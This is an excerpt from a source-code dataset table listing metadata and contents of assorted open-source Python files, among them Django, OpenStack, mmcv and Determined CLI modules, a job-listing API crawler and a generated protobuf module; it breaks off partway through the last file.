blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
97d15d6f45852f8ad8f5576eff06fea5cb1089b3
|
43cbef9a8b7424fb7144255d1d9494be828e3b4c
|
/nes_randomizer/registration/urls.py
|
a6c54bd79ab683e6b46d4559d9fdcb440476523a
|
[] |
no_license
|
thebmo/NESRandomizer
|
59135814c3dd23d948af1f5ce7ca236c8f96dc56
|
1bad8c3ba8ed2a513f3ecd7005023f063fc3ba1f
|
refs/heads/master
| 2020-07-05T08:19:02.916233 | 2015-11-03T03:34:32 | 2015-11-03T03:34:32 | 22,393,483 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 147 |
py
|
from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('',
url(r'^$', views.register, name='register'),
)
|
[
"[email protected]"
] | |
46605773042e4694045207282c63666f3ac7d88a
|
b5550fc728b23cb5890fd58ccc5e1668548dc4e3
|
/network/security_group/openstack_driver.py
|
9717ba421b4a63ea98d5328cfd53bec9b7f01766
|
[] |
no_license
|
bopopescu/nova-24
|
0de13f078cf7a2b845cf01e613aaca2d3ae6104c
|
3247a7199932abf9718fb3260db23e9e40013731
|
refs/heads/master
| 2022-11-20T00:48:53.224075 | 2016-12-22T09:09:57 | 2016-12-22T09:09:57 | 282,140,423 | 0 | 0 | null | 2020-07-24T06:24:14 | 2020-07-24T06:24:13 | null |
UTF-8
|
Python
| false | false | 1,631 |
py
|
#coding:utf-8
# Copyright 2013 Nicira, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from nova.openstack.common import importutils
security_group_opts = [
cfg.StrOpt('security_group_api',
default='nova',
help='The full class name of the security API class'),
]
CONF = cfg.CONF
CONF.register_opts(security_group_opts)
NOVA_DRIVER = ('nova.api.openstack.compute.contrib.security_groups.'
'NativeNovaSecurityGroupAPI')
NEUTRON_DRIVER = ('nova.api.openstack.compute.contrib.security_groups.'
'NativeNeutronSecurityGroupAPI')
def get_openstack_security_group_driver():
if CONF.security_group_api.lower() == 'nova':
return importutils.import_object(NOVA_DRIVER)
elif CONF.security_group_api.lower() in ('neutron', 'quantum'):
return importutils.import_object(NEUTRON_DRIVER)
else:
return importutils.import_object(CONF.security_group_api)
def is_neutron_security_groups():
return CONF.security_group_api.lower() in ('neutron', 'quantum')
|
[
"[email protected]"
] | |
0d8cf3d920dc76f0c4b05c2d553f6846e4799bcb
|
edc80b253c0ad88a421f7cd341d695e601fde73d
|
/utils.py
|
1194f99c9f18970a5625febf931cca1ec72e84ff
|
[
"MIT"
] |
permissive
|
prashantramangupta/snet-platform-usage
|
62cc4061326e89ca39c1b3105362fc4b4fb9509c
|
41b0669ebebf116012f312a333d0b3cbcdcf8519
|
refs/heads/master
| 2022-11-04T23:57:35.611828 | 2022-10-13T05:03:05 | 2022-10-13T05:03:05 | 177,531,350 | 1 | 1 |
MIT
| 2022-10-12T10:20:37 | 2019-03-25T06:56:31 |
Python
|
UTF-8
|
Python
| false | false | 1,607 |
py
|
import json
import datetime
import decimal
import requests
from constant import SLACK_HOOK
IGNORED_LIST = ['row_id', 'row_created', 'row_updated']
class Utils:
def __init__(self):
self.msg_type = {
0 : 'info:: ',
1 : 'err:: '
}
def report_slack(self, type, slack_msg):
url = SLACK_HOOK['hostname'] + SLACK_HOOK['path']
prefix = self.msg_type.get(type, "")
print(url)
payload = {"channel": "#contract-index-alerts",
"username": "webhookbot",
"text": prefix + slack_msg,
"icon_emoji": ":ghost:"
}
resp = requests.post(url=url, data=json.dumps(payload))
print(resp.status_code, resp.text)
def clean(self, value_list):
for value in value_list:
self.clean_row(value)
def clean_row(self, row):
for item in IGNORED_LIST:
del row[item]
for key in row:
if isinstance(row[key], decimal.Decimal) or isinstance(row[key], datetime.datetime):
row[key] = str(row[key])
elif isinstance(row[key], bytes):
if row[key] == b'\x01':
row[key] = 1
elif row[key] == b'\x00':
row[key] = 0
else:
raise Exception("Unsupported bytes object. Key " + str(key) + " value " + str(row[key]))
return row
def remove_http_https_prefix(self, url):
url = url.replace("https://","")
url = url.replace("http://","")
return url
|
[
"[email protected]"
] | |
50d7896ca2a3fd81c7a3a5b423c105fc094df359
|
0f2112a0e198cb0275c002826854c836bbfb5bdf
|
/pywicta/image/__init__.py
|
ebc8b9794d95d617edc05784841fc62efa089799
|
[
"MIT"
] |
permissive
|
jeremiedecock/pywi-cta
|
a7f98ae59beb1adecb25623153c13e5bc70e5560
|
1185f7dfa48d60116472c12ffc423be78a250fc9
|
refs/heads/master
| 2021-04-15T12:06:03.723786 | 2019-03-21T02:33:15 | 2019-03-21T02:33:15 | 126,397,380 | 0 | 1 |
MIT
| 2018-10-16T12:17:52 | 2018-03-22T21:31:45 |
Python
|
UTF-8
|
Python
| false | false | 158 |
py
|
"""Image functions
This package contains additional image processing functions.
"""
from . import hillas_parameters
from . import signal_to_border_distance
|
[
"[email protected]"
] | |
936ac1a26cc0f0c3c4098e4dab5068c152183601
|
786de89be635eb21295070a6a3452f3a7fe6712c
|
/root/tags/V00-03-00/SConscript
|
79a8398cab91d01f66746f757727ba8c866b37e9
|
[] |
no_license
|
connectthefuture/psdmrepo
|
85267cfe8d54564f99e17035efe931077c8f7a37
|
f32870a987a7493e7bf0f0a5c1712a5a030ef199
|
refs/heads/master
| 2021-01-13T03:26:35.494026 | 2015-09-03T22:22:11 | 2015-09-03T22:22:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,056 |
#--------------------------------------------------------------------------
# File and Version Information:
# $Id$
#
# Description:
# SConscript file for package root
#------------------------------------------------------------------------
# Do not delete following line, it must be present in
# SConscript file for any SIT project
Import('*')
from os.path import join as pjoin
from SConsTools.standardExternalPackage import standardExternalPackage
#
# For the standard external packages which contain includes, libraries,
# and applications it is usually sufficient to call standardExternalPackage()
# giving some or all parameters.
#
root_ver = "5.34.25"
PREFIX = pjoin('$SIT_EXTERNAL_SW', "root", root_ver + "-$PYTHON")
INCDIR = "include/root"
LIBDIR = "lib"
LINKLIBS = "lib*.so*"
PKGLIBS = "Core Cint RIO Net Hist Graf Graf3d Gpad Tree Rint Postscript Matrix Physics MathCore Thread m dl"
BINDIR = "bin"
LINKBINS = "root root.exe rootcint root-config"
PYDIR = "lib"
LINKPY = "*.py libPyROOT.so*"
standardExternalPackage('root', **locals())
|
[
"[email protected]@b967ad99-d558-0410-b138-e0f6c56caec7"
] |
[email protected]@b967ad99-d558-0410-b138-e0f6c56caec7
|
|
47aedceb25e986a3e5d3aae64be46cd960624d18
|
81f128c1d3ffc57ea35053a0f42bc3adb8ac820d
|
/MxShop/db_tools/import_goods_data.py
|
71e3cfa1b711929ae1f857f0ba8333e70073b35b
|
[] |
no_license
|
tminlun/tminlun-MxShop
|
f06816b5f596cffb7fa634891a70567055de1bf9
|
a1ccf4b05edd8b47ad716fe65072b5be6e501e50
|
refs/heads/master
| 2022-12-10T11:08:28.043339 | 2019-04-15T15:12:44 | 2019-04-15T15:12:44 | 176,200,320 | 0 | 0 | null | 2022-12-08T01:43:02 | 2019-03-18T03:47:29 |
Python
|
UTF-8
|
Python
| false | false | 2,099 |
py
|
# _*_ encoding:utf-8 _*_
__author__: '田敏伦'
__date__: '2019/2/27 0027 20:38'
# 导入goods的数据
import sys
import os
pwd = os.path.dirname(os.path.realpath(__file__))
sys.path.append(pwd + "../")
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'MxShop.settings')
import django
django.setup()
from db_tools.data.product_data import row_data
from goods.models import Goods,GoodsCategory,GoodsImage
for goods_detail in row_data:
goods = Goods()
goods.name = goods_detail["name"]
# replace("¥", "")把¥替换成 ""
goods.market_price = float(int(goods_detail["market_price"].replace("¥", "").replace("元", "")))
goods.shop_price = float(int(goods_detail["sale_price"].replace("¥", "").replace("元", "")))
# 如果内容不为None传递给goods_brief ,否则: else(为None) 把None转换为"",传递给goods_brief
goods.goods_brief = goods_detail["desc"] if goods_detail["desc"] is not None else ""
goods.goods_desc = goods_detail["goods_desc"] if goods_detail["goods_desc"] is not None else ""
# 取第一张作为封面图 [如果有就传递值,如果没有(else)传递""。image在数据库默认为str ]
goods.goods_front_image = goods_detail["images"][0] if goods_detail["images"] else ""
# 取第三级分类,作为商品的分类
category_name = goods_detail["categorys"][-1]
# 选用filter不用get。因为filter没有匹配的返回空字符串,不会抛异常,get会抛异常(只能传外键给goods.category,直接传str会出错)
category = GoodsCategory.objects.filter(name=category_name)
print(category[0]) # category是一个对象,goods.category需要字符串,category[0]返回对象的字符串
if category:
goods.category = category[0] # 当前数据的商品的分类
goods.save()
# 商品的图片
for good_image in goods_detail["images"]:
goods_image_instance = GoodsImage()
goods_image_instance.image = good_image
goods_image_instance.goods = goods # 上面有遍历每一个goods
goods_image_instance.save()
|
[
"[email protected]"
] | |
150031906408644576efe4932f757a1e0abf4fa8
|
ddddaa700e4642f46a2c1e1e0271a7c8ea62ba0f
|
/harness/determined/cli/sso.py
|
026b6b502e98d88856d356e481ab9bf2cf8167e6
|
[
"Apache-2.0"
] |
permissive
|
determined-ai/determined
|
9d563cb5ffd074c88ee5edc9bf22ab9c3cb78c7e
|
8239b1993f4f44390f4e88901ffaf3b12429b83c
|
refs/heads/main
| 2023-08-21T12:13:36.651298 | 2023-08-21T08:34:16 | 2023-08-21T08:34:16 | 253,846,879 | 2,531 | 330 |
Apache-2.0
| 2023-09-14T21:54:17 | 2020-04-07T16:12:29 |
Go
|
UTF-8
|
Python
| false | false | 5,240 |
py
|
import sys
import webbrowser
from argparse import Namespace
from getpass import getpass
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any, Callable, List
from urllib.parse import parse_qs, urlparse
from determined.common import api
from determined.common.api import authentication
from determined.common.declarative_argparse import Arg, Cmd
from determined.errors import EnterpriseOnlyError
CLI_REDIRECT_PORT = 49176
def handle_token(master_url: str, token: str) -> None:
tmp_auth = {"Cookie": "auth={token}".format(token=token)}
me = api.get(master_url, "/users/me", headers=tmp_auth, authenticated=False).json()
token_store = authentication.TokenStore(master_url)
token_store.set_token(me["username"], token)
token_store.set_active(me["username"])
print("Authenticated as {}.".format(me["username"]))
def make_handler(master_url: str, close_cb: Callable[[int], None]) -> Any:
class TokenAcceptHandler(BaseHTTPRequestHandler):
def do_GET(self) -> None:
try:
"""Serve a GET request."""
token = parse_qs(urlparse(self.path).query)["token"][0]
handle_token(master_url, token)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(b"You can close this window now.")
close_cb(0)
except Exception as e:
print("Error authenticating: {}.".format(e))
close_cb(1)
def log_message(self, format: Any, *args: List[Any]) -> None: # noqa: A002
# Silence server logging.
return
return TokenAcceptHandler
def sso(parsed_args: Namespace) -> None:
master_info = api.get(parsed_args.master, "info", authenticated=False).json()
try:
sso_providers = master_info["sso_providers"]
except KeyError:
raise EnterpriseOnlyError("No SSO providers data")
if not sso_providers:
print("No SSO providers found.")
return
elif not parsed_args.provider:
if len(sso_providers) > 1:
print("Provider must be specified when multiple are available.")
return
matched_provider = sso_providers[0]
else:
matching_providers = [
p for p in sso_providers if p["name"].lower() == parsed_args.provider.lower()
]
if not matching_providers:
ps = ", ".join(p["name"].lower() for p in sso_providers)
print("Provider {} unsupported. (Providers found: {})".format(parsed_args.provider, ps))
return
elif len(matching_providers) > 1:
print("Multiple SSO providers found with name {}.".format(parsed_args.provider))
return
matched_provider = matching_providers[0]
sso_url = matched_provider["sso_url"] + "?relayState=cli"
if not parsed_args.headless:
if webbrowser.open(sso_url):
print(
"Your browser should open and prompt you to sign on;"
" if it did not, please visit {}".format(sso_url)
)
print("Killing this process before signing on will cancel authentication.")
with HTTPServer(
("localhost", CLI_REDIRECT_PORT),
make_handler(parsed_args.master, lambda code: sys.exit(code)),
) as httpd:
return httpd.serve_forever()
print("Failed to open Web Browser. Falling back to --headless CLI mode.")
example_url = f"Example: 'http://localhost:{CLI_REDIRECT_PORT}/?token=v2.public.[long_str]'"
print(
f"Please open this URL in your browser: '{sso_url}'\n"
"After authenticating, copy/paste the localhost URL "
f"from your browser into the prompt.\n{example_url}"
)
token = None
while not token:
user_input_url = getpass(prompt="\n(hidden) localhost URL? ")
try:
token = parse_qs(urlparse(user_input_url).query)["token"][0]
handle_token(parsed_args.master, token)
except (KeyError, IndexError):
print(f"Could not extract token from localhost URL. {example_url}")
def list_providers(parsed_args: Namespace) -> None:
master_info = api.get(parsed_args.master, "info", authenticated=False).json()
try:
sso_providers = master_info["sso_providers"]
except KeyError:
raise EnterpriseOnlyError("No SSO providers data")
if len(sso_providers) == 0:
print("No SSO providers found.")
return
print("Available providers: " + ", ".join(provider["name"] for provider in sso_providers) + ".")
# fmt: off
args_description = [
Cmd("auth", None, "manage auth", [
Cmd("login", sso, "sign on with an auth provider", [
Arg("-p", "--provider", type=str,
help="auth provider to use (not needed if the Determined master only supports"
" one provider)"),
Arg("--headless", action="store_true", help="force headless cli auth")
]),
Cmd("list-providers", list_providers, "lists the available auth providers", []),
])
] # type: List[Any]
# fmt: on
|
[
"[email protected]"
] | |
01f149a939d7ee4687c0ce58037ed05278e16865
|
04142fdda9b3fb29fb7456d5bc3e504985f24cbe
|
/mmcv/cnn/bricks/upsample.py
|
78fb5bf371712d13a72edf5d57151dca8fce6953
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmcv
|
419e301bbc1d7d45331d67eccfd673f290a796d5
|
6e9ee26718b22961d5c34caca4108413b1b7b3af
|
refs/heads/main
| 2023-08-31T07:08:27.223321 | 2023-08-28T09:02:10 | 2023-08-28T09:02:10 | 145,670,155 | 5,319 | 1,900 |
Apache-2.0
| 2023-09-14T02:37:16 | 2018-08-22T07:05:26 |
Python
|
UTF-8
|
Python
| false | false | 3,299 |
py
|
# Copyright (c) OpenMMLab. All rights reserved.
import inspect
from typing import Dict
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmengine.model import xavier_init
from mmengine.registry import MODELS
MODELS.register_module('nearest', module=nn.Upsample)
MODELS.register_module('bilinear', module=nn.Upsample)
@MODELS.register_module(name='pixel_shuffle')
class PixelShufflePack(nn.Module):
"""Pixel Shuffle upsample layer.
This module packs `F.pixel_shuffle()` and a nn.Conv2d module together to
achieve a simple upsampling with pixel shuffle.
Args:
in_channels (int): Number of input channels.
out_channels (int): Number of output channels.
scale_factor (int): Upsample ratio.
upsample_kernel (int): Kernel size of the conv layer to expand the
channels.
"""
def __init__(self, in_channels: int, out_channels: int, scale_factor: int,
upsample_kernel: int):
super().__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.scale_factor = scale_factor
self.upsample_kernel = upsample_kernel
self.upsample_conv = nn.Conv2d(
self.in_channels,
self.out_channels * scale_factor * scale_factor,
self.upsample_kernel,
padding=(self.upsample_kernel - 1) // 2)
self.init_weights()
def init_weights(self):
xavier_init(self.upsample_conv, distribution='uniform')
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.upsample_conv(x)
x = F.pixel_shuffle(x, self.scale_factor)
return x
def build_upsample_layer(cfg: Dict, *args, **kwargs) -> nn.Module:
"""Build upsample layer.
Args:
cfg (dict): The upsample layer config, which should contain:
- type (str): Layer type.
- scale_factor (int): Upsample ratio, which is not applicable to
deconv.
- layer args: Args needed to instantiate a upsample layer.
args (argument list): Arguments passed to the ``__init__``
method of the corresponding conv layer.
kwargs (keyword arguments): Keyword arguments passed to the
``__init__`` method of the corresponding conv layer.
Returns:
nn.Module: Created upsample layer.
"""
if not isinstance(cfg, dict):
raise TypeError(f'cfg must be a dict, but got {type(cfg)}')
if 'type' not in cfg:
raise KeyError(
f'the cfg dict must contain the key "type", but got {cfg}')
cfg_ = cfg.copy()
layer_type = cfg_.pop('type')
if inspect.isclass(layer_type):
upsample = layer_type
# Switch registry to the target scope. If `upsample` cannot be found
# in the registry, fallback to search `upsample` in the
# mmengine.MODELS.
else:
with MODELS.switch_scope_and_registry(None) as registry:
upsample = registry.get(layer_type)
if upsample is None:
raise KeyError(f'Cannot find {upsample} in registry under scope '
f'name {registry.scope}')
if upsample is nn.Upsample:
cfg_['mode'] = layer_type
layer = upsample(*args, **kwargs, **cfg_)
return layer
|
[
"[email protected]"
] | |
697a14ba16fec12bc6822c838c5c9307b462870a
|
4d7f743f871860e64f7e1e057b32c8af76fe98ff
|
/nmtlab/utils/vocab.py
|
893b2a2fcfcb1d9146383a199150e541bf465ee5
|
[
"MIT"
] |
permissive
|
MarkWuNLP/nmtlab
|
8a822c7d2385f885509b9b3e5d039b8fc38562ad
|
da9c28126336528fc6b85f2d424632ad227a3682
|
refs/heads/master
| 2022-02-21T14:05:10.523962 | 2019-10-05T08:32:21 | 2019-10-05T08:32:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,111 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torchtext.vocab
import pickle
from collections import Counter, defaultdict
DEFAULT_SPECIAL_TOKENS = ["<null>", "<s>", "</s>", "UNK"]
class Vocab(torchtext.vocab.Vocab):
def __init__(self, path=None, unk_token="UNK", picklable=False):
self._unk_token = unk_token
self.itos = []
if picklable:
self.stoi = {}
else:
self.stoi = defaultdict(lambda: 3)
if path:
self.load(path)
def size(self):
return len(self.itos)
def initialize(self, special_tokens=None):
if special_tokens is None:
special_tokens = DEFAULT_SPECIAL_TOKENS
self.itos = special_tokens
self._build_vocab_map()
def build(self, txt_path, limit=None, special_tokens=None, char_level=False, field=None, delim="\t"):
vocab_counter = Counter()
for line in open(txt_path):
line = line.strip()
if field is not None:
line = line.split(delim)[field]
if char_level:
words = [w.encode("utf-8") for w in line.decode("utf-8")]
else:
words = line.split(" ")
vocab_counter.update(words)
if special_tokens is None:
special_tokens = DEFAULT_SPECIAL_TOKENS
if limit is not None:
final_items = vocab_counter.most_common()[:limit - len(special_tokens)]
else:
final_items = vocab_counter.most_common()
final_items.sort(key=lambda x: (-x[1], x[0]))
final_words = [x[0] for x in final_items]
self.itos = special_tokens + final_words
self._build_vocab_map()
def set_vocab(self, unique_tokens, special_tokens=True):
if special_tokens:
self.itos = DEFAULT_SPECIAL_TOKENS + unique_tokens
else:
self.itos = unique_tokens
self._build_vocab_map()
def add(self, token):
if token not in self.stoi:
self.itos.append(token)
self.stoi[token] = self.itos.index(token)
def save(self, path):
pickle.dump(self.itos, open(path, "wb"))
def load(self, path):
with open(path, "rb") as f:
self.itos = pickle.load(f, encoding='utf-8')
self._build_vocab_map()
def _build_vocab_map(self):
self.stoi.update({tok: i for i, tok in enumerate(self.itos)})
def encode(self, tokens):
return list(map(self.encode_token, tokens))
def encode_token(self, token):
if token in self.stoi:
return self.stoi[token]
else:
return self.stoi[self._unk_token]
def decode(self, indexes):
return list(map(self.decode_token, indexes))
def decode_token(self, index):
return self.itos[index] if index < len(self.itos) else self._unk_token
def contains(self, token):
return token in self.stoi
def get_list(self):
return self.itos
|
[
"[email protected]"
] | |
0ff47b51128d4c3f179c4ff101481282d1461151
|
47fabc7be3769cb1d2d17369efe2048818158477
|
/test/test_multinomial_splitting.py
|
fb9f8105646ef967184adf4470dbd210056f4169
|
[
"Apache-2.0"
] |
permissive
|
jpeyhardi/GLM
|
35ae651c4aa9771fec63b7c151858e0555a80c07
|
6f0fd763aec2a0ccdef3901b71ed990f20119510
|
refs/heads/master
| 2021-09-26T08:50:08.938073 | 2018-10-28T13:22:24 | 2018-10-28T13:22:24 | 125,999,551 | 0 | 0 |
Apache-2.0
| 2018-03-20T10:21:13 | 2018-03-20T10:21:09 |
C++
|
UTF-8
|
Python
| false | false | 1,223 |
py
|
from statiskit import (linalg,
core,
glm)
from statiskit.data import glm as data
import unittest
from nose.plugins.attrib import attr
import math
@attr(linux=True,
osx=True,
win=True,
level=0)
class TestMultinomialSplittingRegression(unittest.TestCase):
@classmethod
def setUpClass(cls):
"""Test Multinomial splitting regression construction"""
cls._data = data.load('KN03')
# def test_Fisher_estimation(self):
# """Test negative binomial regression Fisher estimation"""
# data = self._data.extract(explanatories=range(len(self._data.components) - 1),
# response=-1)
# fe = glm.negative_binomial_estimation(algo='Fisher',
# data=data,
# kappa=1.274892646)
# self.assertAlmostEqual(2 * fe.estimated.loglikelihood(data), -1093.15, places=2)
# # self.assertAlmostEqual(2 * fe.estimated.loglikelihood(data), -1093.61, places=2)
@classmethod
def tearDownClass(cls):
"""Test Negative Binomial regression deletion"""
del cls._data
|
[
"[email protected]"
] | |
26abe393261a86288211f6bc9fd241563a9b60ce
|
119a85a388fe436361530fbb47932e704d749557
|
/PEAK-0.5a4dev_r2085/build/lib.macosx-10.6-x86_64-2.7/peak/util/signature.py
|
dbd8a3fbf7c6e8f609c9564bba8de27bd211ea3d
|
[
"Python-2.0"
] |
permissive
|
chrisrgunn/cs156project
|
014d5b05c6bf0e08ab8bd0dea525057d0e65b9a7
|
e5414a37f9793c8b0674695b948482b559b18ea6
|
refs/heads/master
| 2021-01-19T14:09:49.046539 | 2017-05-24T02:10:29 | 2017-05-24T02:10:29 | 88,128,762 | 0 | 2 | null | 2017-05-04T23:49:09 | 2017-04-13T05:36:10 |
Python
|
UTF-8
|
Python
| false | false | 1,270 |
py
|
"""Crude introspection of call signatures"""
import protocols; from protocols import adapt, Interface
from inspect import getargspec
from types import FunctionType, MethodType
__all__ = 'ISignature', 'getPositionalArgs'
class ISignature(Interface):
# XXX There should be a lot more here than this...
def getPositionalArgs():
"""Return a sequence of positional argument names"""
def getCallable():
"""Return the callable object"""
class FunctionAsSignature(protocols.Adapter):
protocols.advise(
instancesProvide=[ISignature],
asAdapterForTypes=[FunctionType]
)
def getPositionalArgs(self):
return getargspec(self.subject)[0]
def getCallable(self):
return self.subject
class MethodAsSignature(FunctionAsSignature):
protocols.advise(
instancesProvide=[ISignature],
asAdapterForTypes=[MethodType]
)
def __init__(self, ob):
self.funcSig = adapt(ob.im_func, ISignature)
self.offset = ob.im_self is not None
self.subject = ob
def getPositionalArgs(self):
return self.funcSig.getPositionalArgs()[self.offset:]
def getPositionalArgs(ob):
return adapt(ob,ISignature).getPositionalArgs()
|
[
"[email protected]"
] | |
4cf2a8b84c3cdd0ebae529ac5397255b44f2e9ee
|
5f2103b1083b088aed3f3be145d01a770465c762
|
/406. Queue Reconstruction by Height.py
|
54dbb0fb8a1dbe5530f49b27d210c81d690d7a0e
|
[] |
no_license
|
supersj/LeetCode
|
5605c9bcb5ddcaa83625de2ad9e06c3485220019
|
690adf05774a1c500d6c9160223dab7bcc38ccc1
|
refs/heads/master
| 2021-01-17T17:23:39.585738 | 2017-02-27T15:08:42 | 2017-02-27T15:08:42 | 65,526,089 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,520 |
py
|
from operator import itemgetter
# todo insert order thinking
class Solution1(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
people.sort(key = itemgetter(1,0))
result = []
start = 0
for ele in people:
if ele[1] == 0:
result.append(ele)
start += 1
else:
break
_last = start
_lastlevel = 0
for i in range(start,len(people)):
cnt = people[i][1]
if cnt != _lastlevel:
_last = 0
_lastlevel = cnt
_index = 0
for num in result:
if cnt == 0:
break
if num[0] >= people[i][0]:
cnt -= 1
_index += 1
_last = max(_last+1,_index)
result.insert(_last,people[i])
return result
class Solution(object):
def reconstructQueue(self, people):
"""
:type people: List[List[int]]
:rtype: List[List[int]]
"""
people.sort(key = lambda x: x[1])
people.sort(key = lambda x: x[0],reverse= True)
result = []
print(people)
for ele in people:
result.insert(ele[1],ele)
return result
p = [[8,2],[4,2],[4,5],[2,0],[7,2],[1,4],[9,1],[3,1],[9,0],[1,0]]
hh = Solution()
hh.reconstructQueue(p)
|
[
"[email protected]"
] | |
1f330a243eabf5b8c046f3eeffcee642a856d548
|
0937646b6ce9249a8d193987f308ce398dc28bd1
|
/104API/104API.py
|
5ec24357b53855d4c9189223fbb28b268e8829ff
|
[] |
no_license
|
barry800414/JobTitleNLP
|
98622d02b25b1418f28698f7d772c8de96642032
|
b379c2052447e6483d17f5db51fb918b37ac7a52
|
refs/heads/master
| 2021-06-08T19:36:39.044757 | 2016-10-21T03:11:10 | 2016-10-21T03:11:10 | 66,043,111 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,863 |
py
|
#!/usr/bin/env python3
# invoke 104 API to get all 104 jobs
import sys
import requests
import json
from getCat import getL3ID
API_URL = "http://www.104.com.tw/i/apis/jobsearch.cfm"
def getJobsByCatID(catID, verbose=0):
jobs = dict()
payload = {
"cat": catID,
"role": 1,
"fmt": 8,
"cols": "J"
}
try:
r = requests.get(API_URL, params = payload)
if verbose >= 1:
print(r.url, r.status_code)
p = r.json()
nPage = int(p['TOTALPAGE'])
for i in range(0, nPage):
jobs.update(__getJobsByCatID(catID, i+1, verbose))
except Exception as e:
print(e, file=sys.stderr)
return jobs
def __getJobsByCatID(catID, page, verbose=0):
jobs = dict()
payload = {
"cat": catID,
"role": 1,
"fmt": 8,
"cols": "J,JOB,JOBCAT_DESCRIPT,NAME",
"page": page
}
try:
r = requests.get(API_URL, params = payload)
if verbose >= 2:
print(r.url, r.status_code)
p = r.json()
for d in p['data']:
cat = [c for c in d['JOBCAT_DESCRIPT'].split('@') if c != "類目"]
jobs[d['J']] = { "title": d['JOB'], "cat": cat, 'company_name': d['NAME'] }
except Exception as e:
print(e, file=sys.stderr)
return jobs
if __name__ == '__main__':
if len(sys.argv) != 3:
print('Usage:', sys.argv[0], 'category outJsonFile', file=sys.stderr)
exit(-1)
with open(sys.argv[1], 'r') as f:
rawCat = json.load(f)
cat = getL3ID(rawCat)
# all job category ids
allJobs = dict()
for i, (catID, catName) in enumerate(cat.items()):
print('(%d/%d) Start crawling Category %s(%s):' % (i+1, len(cat), catName, catID), end='', flush=True)
jobs = getJobsByCatID(catID)
print('%d' % len(jobs), flush=True)
allJobs[catName] = jobs
with open(sys.argv[2], 'w') as f:
json.dump(allJobs, f, indent=1, ensure_ascii=False)
|
[
"[email protected]"
] | |
a3ddfd87f910aeddaeb2fdccc180e2928ab42be7
|
bc441bb06b8948288f110af63feda4e798f30225
|
/object_store_sdk/model/notify/subscriber_pb2.py
|
692c20775b418cfdc51ab0f6e6720297f4eb1271
|
[
"Apache-2.0"
] |
permissive
|
easyopsapis/easyops-api-python
|
23204f8846a332c30f5f3ff627bf220940137b6b
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
refs/heads/master
| 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null |
UTF-8
|
Python
| false | true | 5,376 |
py
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: subscriber.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from object_store_sdk.model.notify import subscribe_info_pb2 as object__store__sdk_dot_model_dot_notify_dot_subscribe__info__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='subscriber.proto',
package='notify',
syntax='proto3',
serialized_options=_b('[email protected]/contracts/protorepo-models/easyops/model/notify'),
serialized_pb=_b('\n\x10subscriber.proto\x12\x06notify\x1a\x32object_store_sdk/model/notify/subscribe_info.proto\"\xab\x01\n\nSubscriber\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05\x61\x64min\x18\x02 \x01(\t\x12\x10\n\x08\x63\x61llback\x18\x03 \x01(\t\x12\x0f\n\x07\x65nsName\x18\x04 \x01(\t\x12\x0f\n\x07procNum\x18\x05 \x01(\x05\x12\x0f\n\x07msgType\x18\x06 \x01(\x05\x12\r\n\x05retry\x18\x07 \x01(\x05\x12,\n\rsubscribeInfo\x18\x08 \x03(\x0b\x32\[email protected]/contracts/protorepo-models/easyops/model/notifyb\x06proto3')
,
dependencies=[object__store__sdk_dot_model_dot_notify_dot_subscribe__info__pb2.DESCRIPTOR,])
_SUBSCRIBER = _descriptor.Descriptor(
